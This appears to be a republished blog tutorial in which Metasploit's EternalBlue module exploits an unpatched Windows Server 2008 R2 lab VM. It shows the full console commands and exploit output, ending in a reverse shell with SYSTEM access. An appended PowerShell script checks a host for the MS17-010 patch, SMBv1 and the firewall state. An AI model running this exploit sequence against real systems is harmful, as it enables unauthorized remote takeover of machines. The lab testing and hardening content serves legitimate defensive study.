Using Metasploit to test whether a Windows Server 2008 VM is vulnerable to EternalBlue
Source: Internet  Editor: 程序博客网  Time: 2024/05/04 09:53
EternalBlue is an exploit developed by the United States National Security Agency; it was leaked by the hacker group The Shadow Brokers on April 14, 2017.
Although Microsoft had released operating-system patches for the vulnerability on March 14, 2017, many Windows users still had not installed them when the WannaCry ransomware used it to spread on May 12.
Because of the severity of WannaCry, on May 13, 2017 Microsoft issued emergency security updates for Windows XP, Windows 8 and Windows Server 2003, which were already past their support periods, to stop WannaCry from spreading.
On June 27, 2017, a variant of the Petya ransomware likewise used the EternalBlue vulnerability to launch a global cyberattack. (From Wikipedia)
Attacking machine: 192.168.68.137 (Kali Linux 2.0)
Target machine: 192.168.68.136 (Windows Server 2008 R2, with the relevant patch not installed and the firewall turned off)
Module used in this test: exploit/windows/smb/ms17_010_eternalblue
Command breakdown:
msfconsole: start the Metasploit command-line console
search: search for modules related to ms17_010
use: select the module to work with
show options: list the parameters that need to be set
set rhost: set the target address
exploit: run the exploit (that is, the test)
root@xw:~# msfconsole
=[ metasploit v4.16.18-dev ]
+ -- --=[ 1703 exploits - 969 auxiliary - 299 post ]
+ -- --=[ 503 payloads - 40 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > search ms17_010

Matching Modules
================

   Name                                      Disclosure Date  Rank     Description
   ----                                      ---------------  ----     -----------
   auxiliary/scanner/smb/smb_ms17_010                         normal   MS17-010 SMB RCE Detection
   exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption

msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST                                yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

msf exploit(ms17_010_eternalblue) > set rhost 192.168.68.136
rhost => 192.168.68.136
msf exploit(ms17_010_eternalblue) > exploit
# The automated test run follows
[*] Started reverse TCP handler on 192.168.68.137:4444
[*] 192.168.68.136:445 - Connecting to target for exploitation.
[+] 192.168.68.136:445 - Connection established for exploitation.
[+] 192.168.68.136:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.68.136:445 - CORE raw buffer dump (53 bytes)
[*] 192.168.68.136:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 192.168.68.136:445 - 0x00000010 30 30 38 20 52 32 20 44 61 74 61 63 65 6e 74 65 008 R2 Datacente
[*] 192.168.68.136:445 - 0x00000020 72 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50 r 7601 Service P
[*] 192.168.68.136:445 - 0x00000030 61 63 6b 20 31 ack 1
[+] 192.168.68.136:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.68.136:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.68.136:445 - Sending all but last fragment of exploit packet
[*] 192.168.68.136:445 - Starting non-paged pool grooming
[+] 192.168.68.136:445 - Sending SMBv2 buffers
[+] 192.168.68.136:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.68.136:445 - Sending final SMBv2 buffers.
[*] 192.168.68.136:445 - Sending last fragment of exploit packet!
[*] 192.168.68.136:445 - Receiving response from exploit packet
[+] 192.168.68.136:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.68.136:445 - Sending egg to corrupted connection.
[*] 192.168.68.136:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (192.168.68.137:4444 -> 192.168.68.136:51569) at 2017-11-27 15:03:06 +0800
[+] 192.168.68.136:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.68.136:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.68.136:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# The reverse shell
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。
C:\Windows\system32>whoami
whoami
nt authority\system
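The target above was deliberately left without the MS17-010 update and with its firewall off, and the session ends as NT AUTHORITY\SYSTEM because the exploit corrupts the SMBv1 server's kernel pool. The search output earlier also lists auxiliary/scanner/smb/smb_ms17_010, a detection-only module for checking a host from the network without running the kernel-pool exploit. For the host-side view of the same question, the following PowerShell script is an added example, not part of the original post, that inspects a Windows Server 2008 R2 SP1 (or Windows 7 SP1) host for the three conditions the lab target was built with plus the SMBv1 server switch. KB4012212 and KB4012215 are assumed here to be the March 2017 security-only and monthly-rollup updates carrying the MS17-010 fix for this OS family (confirm against the bulletin before relying on it); the function names Test-Ms17010Exposure and Disable-Smb1Server are the example's own.

```powershell
# Added example, not from the original post: host-side check for the conditions
# that let the exploit above succeed on Windows Server 2008 R2 SP1 / Windows 7 SP1.
# Run in an elevated PowerShell (2.0 or later) on the host being checked.
# Assumption: KB4012212 (security-only) and KB4012215 (monthly rollup) are the
# March 2017 updates that ship the MS17-010 fix for this OS family. Later monthly
# rollups are cumulative and include it too, so "neither KB listed" means
# "verify further", not "definitely exposed".

function Test-Ms17010Exposure {
    $findings = @()

    # 1. MS17-010 update. Get-HotFix reads the installed-update list.
    $ms17010Kbs = @('KB4012212', 'KB4012215')
    $present = Get-HotFix | Where-Object { $ms17010Kbs -contains $_.HotFixID }
    if ($present) {
        $ids = ($present | ForEach-Object { $_.HotFixID }) -join ', '
        $findings += "[OK]   MS17-010 update installed: $ids"
    } else {
        $findings += "[WARN] Neither KB4012212 nor KB4012215 is listed; confirm a later cumulative rollup is installed before treating the host as patched."
    }

    # 2. SMBv1 server. The exploit drives the SMBv1 server, so disabling it removes
    #    the attack surface even on an unpatched host. On this OS the switch is the
    #    SMB1 DWORD under LanmanServer\Parameters; an absent value means the default,
    #    which is enabled.
    $lanman = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
    $smb1 = (Get-ItemProperty -Path $lanman -Name SMB1 -ErrorAction SilentlyContinue).SMB1
    if ($smb1 -eq 0) {
        $findings += "[OK]   SMBv1 server is disabled (SMB1 = 0)."
    } else {
        $findings += "[WARN] SMBv1 server is enabled (SMB1 value missing or non-zero)."
    }

    # 3. Windows Firewall. The lab target had it switched off. netsh output is
    #    localized, so on a non-English system adjust the pattern or read each
    #    profile's 'State' line by hand.
    $fwState = netsh advfirewall show allprofiles state
    if ($fwState -match 'OFF') {
        $findings += "[WARN] At least one firewall profile is OFF."
    } else {
        $findings += "[OK]   All firewall profiles report ON."
    }

    # 4. Is TCP 445 listening at all? Expected on a file server; recorded so the
    #    reader can decide whether this host should be offering SMB.
    $listening = netstat -ano | Select-String -Pattern ':445\s+.*LISTENING'
    if ($listening) {
        $findings += "[INFO] TCP 445 is listening."
    } else {
        $findings += "[INFO] No TCP 445 listener found."
    }

    return $findings
}

function Disable-Smb1Server {
    # Microsoft's documented mitigation for this OS: set SMB1 = 0 and reboot.
    $lanman = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
    Set-ItemProperty -Path $lanman -Name SMB1 -Type DWORD -Value 0 -Force
    Write-Output "SMB1 set to 0 under LanmanServer\Parameters; reboot to apply."
}

# Report only; call Disable-Smb1Server separately once the change has been approved.
Test-Ms17010Exposure | ForEach-Object { Write-Output $_ }
```

On the lab target described above this script would report [WARN] on all of the first three checks. The patch check is the one that actually closes the vulnerability; disabling SMBv1 and keeping the firewall on are the compensating controls that stop the exploit packet from reaching a vulnerable srv.sys in the first place, which is why both are worth verifying even on a host that believes it is patched.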